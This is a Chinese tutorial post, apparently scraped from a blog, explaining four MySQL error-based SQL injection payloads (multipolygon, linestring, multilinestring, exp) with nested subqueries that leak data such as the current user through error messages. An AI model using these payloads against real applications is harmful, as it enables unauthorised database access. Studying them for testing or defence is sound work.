这回间隔时间有点长了,年前年后忙的头晕眼花,外加大病。下面我继续讲解。

1、multipolygon()

select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

函数讲解:

multipolygon()是一种由Polygon元素构成的几何对象集合。

原理解释:

multipolygon()需要的是Polygon元素。为了显错传入字符串,所以报错。

2、linestring()

select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

函数讲解:

LineString()是具有点之间线性内插特性的Curve.

原理解释:

LineString(1 1,2 2) 这是它的用法。为了显错传入了,字符串....

3、multilinestring()

select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

函数讲解:

multilinestring()是一种由LineStirng元素构成的MultiCurve几何对象集合。

原理解释:

MULTILINESTRING((10 10, 20 20), (15 15, 30 15))这样用的。为了显错又把字符串传进去了。

4、exp()

select * from test where id=1 and exp(~(select * from(select user())a));

函数解释:

EXP(x)函数计算e的x次方,即ex。

原理解释:

EXP()肯定是需要数字的,传入个字符串必然显错。

到这里这十种就完结了,其实还有很多方法可以显错,不限于这十种。共同特点在于,传入非正常参数导致报错和查询嵌套。

原文:http://www.cnblogs.com/MiWhite/p/6384711.html

mysql跨年统计年前年后_十种MYSQL显错注入原理讲解(三)相关推荐

  1. 什么是mysql显错注入_十种MYSQL显错注入原理讲解(三)

    这回间隔时间有点长了,年前年后忙的头晕眼花,外加大病.下面我继续讲解. 1.multipolygon() select * from test where id=1 and multipolygon( ...

  2. mysql跨年统计年前年后_PHP面试总结 - osc_chmxgjn9的个人空间 - OSCHINA - 中文开源技术交流社区...

    18.一群猴子排成一圈,按1,2,-,n依次编号.然后从第1只开始数,数到第m只,把它踢出圈,从它后面再开始数,再数到第m只,在把它踢出去-,如此不停 的进行下去,直到最后只剩下一只猴子为止,那只猴子 ...

  3. MySQL用函数统计记录总数_在mysql中使用COUNT 或者SUM函数计算记录总数

    count函数的作用 想要真正的理解count函数,我们就必须明白count函数的作用. 作用一:统计某一列非空(not null)值得数量,即统计某列有值得结果数,使用count(col),其中co ...

  4. MYSQL注入-显错注入

    MYSQL注入-显错注入 原理:将插入的数据当作数据库代码执行. 1.首先我们看到页面要判断是否存在注入 2.用 and 1=1 无变化 ; and 1=2 发现有变化,说明可能存在注入 3.对字段进 ...

  5. mysql注入原理_Mysql报错注入原理分析

    报错类型Duplicate entry报错:多次查询插入重复键值导致count报错从而在报错信息中带入了敏感信息. Xpath报错:从mysql5.1.5开始提供两个XML查询和修改的函数,语法错误导 ...

  6. 如何给mysql表添加百万条数据_给mysql一百万条数据的表添加索引

    直接alter table add index 添加索引,执行一个小时没反应,并且会导致锁表:故放弃该办法,最终解决办法如下: 一.打开mysql 命令行客户端 这里我们那可以看到导出的数据文件所存放 ...

  7. mysql数据库是一个软件呐_【MySQL数据库软件、SQL】

    内容 数据库的基本概念 MySQL数据库软件 安装 卸载 配置 SQL 数据库的基本概念 1. 数据库的英文单词: DataBase 简称 : DB 2. 什么数据库? * 用于存储和管理数据的仓库. ...

  8. 关于mysql的项把他们都_卸载mysql | 学步园

    如果你的电脑里装过MySQL,想再重新安装MySQL的时候可能就会因为前一版本卸载不完全而出现错误了--最常见的就是安装好后设置参数的最后一步验证时,会在Execute configurattion步 ...

  9. mysql转义单引号双引号_[转] mysql 单引号 双引号

    今天在写一条sql语句的时候,用的双引号,sql语句执行错误.记的同事问我mysql语句中的单引号和双引号有区别吗?回答是没有区别. 今天特地查了查,还是有点区别的. mysql中的一段说明: 在my ...

最新文章

  1. 非抢占式优先算法例题_三维点云的经典算法与前沿技术有哪些?
  2. 量子计算生态:市场预期、行业应用与“霸权”争夺
  3. 值得收藏!脑科学、脑机接口领域白皮书、研究报告汇总
  4. PT60报错(在表 $ 中午关键字$的输入项目T555Z)
  5. hilb--生成Hilbert(希尔伯特)矩阵
  6. VB:使用Visual Studio 2010中的VB语言工具箱DataGridView调用SQL数据库Database的表格文件
  7. Python自动化开发课堂笔记【Day13】 - 前端补充(HTML CSS)
  8. 分布式架构的session问题
  9. centos7更换源
  10. java 试卷自动生成_基于JAVA的试题自动生成系统 - WEB源码|JSP源码/Java|源代码 - 源码中国...
  11. Android应用程序开发实用案例50则
  12. DXF格式文件导入AD,做成可加工的PCB文件
  13. 小米笔记本安装系统 声卡驱动安装不上
  14. 华为服务器虚拟kvm退出全屏,kvm虚拟机全屏快捷键
  15. 黑马程序员---继承(下)
  16. sql 时间的模糊查询
  17. 做业务的程序猿如何提升技能?
  18. 思齐什么意思_思齐的寓意
  19. 远程工具MobaXterm安装和使用教程
  20. MindMapper 总结SQL Server

热门文章

  1. Python 爬虫进阶必备 | 某音乐网站查询参数加密逻辑分析(分离式 webpack 的加密代码扣取详解)...
  2. Bootstrap 3.x 打印问题 打印无法显示背景、字体变黑
  3. python和java哪个好学-Java和Python的前景哪个更好 学习难度呢
  4. win10 无法删除 注册表 蓝牙_如何解决处理深度技术Win10系统删除注册表项时出错问题...
  5. 雷达仿真程序,单脉冲雷达交叉眼干扰,单频脉冲信号距离分辨力
  6. 今天考驾照了吗?驾考宝典产品框架界面设计稿
  7. bootstrap表格的上移下移
  8. 阿里云ECS云服务器购买流程
  9. 刷脸支付核心靠的就是人脸识别技术
  10. Python数据分析实战:上海二手房价分析